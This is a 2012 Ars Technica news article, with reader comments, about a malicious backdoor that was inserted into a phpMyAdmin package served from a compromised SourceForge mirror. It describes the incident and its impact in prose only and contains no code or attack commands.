Biz & IT —

Questions abound as malicious phpMyAdmin backdoor found on SourceForge site

Secret code added to the package gives attackers the ability to hijack servers.

Dan Goodin - Sep 25, 2012 6:05 pm UTC

A screenshot of a system containing a malicious backdoor that was snuck into the open-source phpMyAdmin package. Researchers said the file date may be fraudulent.

Developers of phpMyAdmin warned users they may be running a malicious version of the open-source software package after discovering backdoor code was snuck into a package being distributed over the widely used SourceForge repository.

The backdoor contains code that allows remote attackers to take control of the underlying server running the modified phpMyAdmin, which is a Web-based tool for managing MySQL databases. The PHP script is found in a file named server_sync.php, and it reads PHP code embedded in standard POST Web requests and then executes it. That allows anyone who knows the backdoor is present to execute code of his choice. HD Moore, CSO of Rapid7 and chief architect of the Metasploit exploit package for penetration testers and hackers, told Ars a module has already been added that tests for the vulnerability.

The backdoor is concerning because it was distributed on one of the official mirrors for SourceForge, which hosts more than 324,000 open-source projects, serves more than 46 million consumers, and handles more than four million downloads each day. SourceForge officials are still investigating the breach, so crucial questions remain unanswered. It's still unclear, for instance, if the compromised server hosted other maliciously modified software packages, if other official SourceForge mirror sites were also affected, and if the central repository that feeds these mirror sites might also have been attacked.

"If that one mirror was compromised, nearly every SourceForge package on that mirror could have been backdoored, too," Moore said. "So you're looking at not just phpMyAdmin, but 12,000 other projects. If that one mirror was compromised and other projects were modified this isn't just 1,000 people. This is up to a couple hundred thousand."

An advisory posted Tuesday on phpMyAdmin said: "One of the SourceForge.net mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified." phpMyAdmin officials didn't respond to e-mails seeking to learn how long the backdoored version had been available and how many people have downloaded it.

Update: In a blog post, SourceForge officials said they believe only the affected phpMyAdmin-3.5.2.2-all-languages.zip package was the only modified file on the cdnetworks mirror site, but they are continuing to investigate to make sure. Logs indicate that about 400 people downloaded the malicious package. The provider of the Korea-based mirror has confirmed the breach, which is believe to have happened around September 22, and indicated it was limited to that single mirror site. The machine has been taken out of rotation.

"Downloaders are at risk only if a corrupt copy of this software was obtained, installed on a server, and serving was enabled," the SourceForge post said. "Examination of web logs and other server data should help confirm whether this backdoor was accessed."

It's not the first time a widely used open-source project has been hit by a breach affecting the security of its many downstream users. In June of last year, WordPress required all account holders on WordPress.org to change their passwords following the discovery that hackers contaminated it with malicious software. Three months earlier, maintainers of the PHP programming language spent several days scouring their source code for malicious modifications after discovering the security of one of their servers had been breached.

A three-day security breach in 2010 on ProFTP caused users who downloaded the package during that time to be infected with a malicious backdoor. The main source-code repository for the Free Software Foundation was briefly shuttered that same year following the discovery of an attack that compromised some of the website's account passwords and may have allowed unfettered administrative access. And last August, multiple servers used to maintain and distribute the Linux operating system were infected with malware that gained root system access, although maintainers said the repository was unaffected.

This article will be updated as more details become available.

Article updated to include details from SourceForge blog post.

Promoted Comments

praetor_alpha | Smack-Fu Master, in training
jump to post

This could be damaging to a few people. I know that every few days, some chinese script kiddie scans my site for every version of phpMyAdmin released. I don't have phpMyAdmin. And I don't use MySQL. Or PHP.

7 posts | registered Sep 6, 2012
abadidea | Ars Centurion
jump to post

LoneBagel wrote:
So how wide open was this back door? If it can execute code that code will normally be executed as the apache user, not root, and if SELinux is running at least in targeted mode (as it should) then the things that the attacker can do should be pretty minimal, no?

Or is the attack not just a backdoor but also an elevation exploit in PHP?

Based on a quick looksie, it's about as simple and straightforward as a PHP backdoor can possibly be. It can't do anything a normal PHP source file can't do in your installation. But there's usually a lot a PHP file can do - think databases.

When I heard there was a phpmyadmin problem I kinda assumed it would have been the devs who screwed up, but it looks like it was not the fault of anyone on the phpmyadmin team; it could have been any package on that server which was targeted, and indeed they need to very very carefully look for more.

398 posts | registered Apr 14, 2010
SynchroM | Smack-Fu Master, in training
jump to post

I don't get why all the comments are about phpMyAdmin - the same thing could have been done to any PHP script such as say, SugarCRM. If you're going to bother doing a hack like this you may as well go for something popular.

There is no hole in phpMyAdmin behind this. There is, evidently, a hole in sourceforge's security. The comments relating to checking hashes are the only ones that makes any sense, and they should compare checksums across all the packages it's hosting before wiping it completely. SF's been dismal for years; I've moved everything to GitHub which is far more effective at fostering a community spirit.

Unfortunately I wouldn't be able to see HeidiSQL, having already stabbed my eyes from having had to use Windows. I've tried about 20-odd desktop MySQL apps on numerous platforms, but have never liked any (not least because they usually require external MySQL access, something that web-based tools don't need), and I always end up back in a terminal.

6 posts | registered Aug 27, 2011

Promoted Comments

praetor_alpha | Smack-Fu Master, in training
jump to post

This could be damaging to a few people. I know that every few days, some chinese script kiddie scans my site for every version of phpMyAdmin released. I don't have phpMyAdmin. And I don't use MySQL. Or PHP.

7 posts | registered Sep 6, 2012
abadidea | Ars Centurion
jump to post

LoneBagel wrote:
So how wide open was this back door? If it can execute code that code will normally be executed as the apache user, not root, and if SELinux is running at least in targeted mode (as it should) then the things that the attacker can do should be pretty minimal, no?

Or is the attack not just a backdoor but also an elevation exploit in PHP?

Based on a quick looksie, it's about as simple and straightforward as a PHP backdoor can possibly be. It can't do anything a normal PHP source file can't do in your installation. But there's usually a lot a PHP file can do - think databases.

When I heard there was a phpmyadmin problem I kinda assumed it would have been the devs who screwed up, but it looks like it was not the fault of anyone on the phpmyadmin team; it could have been any package on that server which was targeted, and indeed they need to very very carefully look for more.

398 posts | registered Apr 14, 2010
SynchroM | Smack-Fu Master, in training
jump to post

I don't get why all the comments are about phpMyAdmin - the same thing could have been done to any PHP script such as say, SugarCRM. If you're going to bother doing a hack like this you may as well go for something popular.

There is no hole in phpMyAdmin behind this. There is, evidently, a hole in sourceforge's security. The comments relating to checking hashes are the only ones that makes any sense, and they should compare checksums across all the packages it's hosting before wiping it completely. SF's been dismal for years; I've moved everything to GitHub which is far more effective at fostering a community spirit.

Unfortunately I wouldn't be able to see HeidiSQL, having already stabbed my eyes from having had to use Windows. I've tried about 20-odd desktop MySQL apps on numerous platforms, but have never liked any (not least because they usually require external MySQL access, something that web-based tools don't need), and I always end up back in a terminal.

6 posts | registered Aug 27, 2011

Dan Goodin Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene.

Channel Ars Technica

← Previous story Next story →

Promoted Comments

Promoted Comments

reader comments

Channel Ars Technica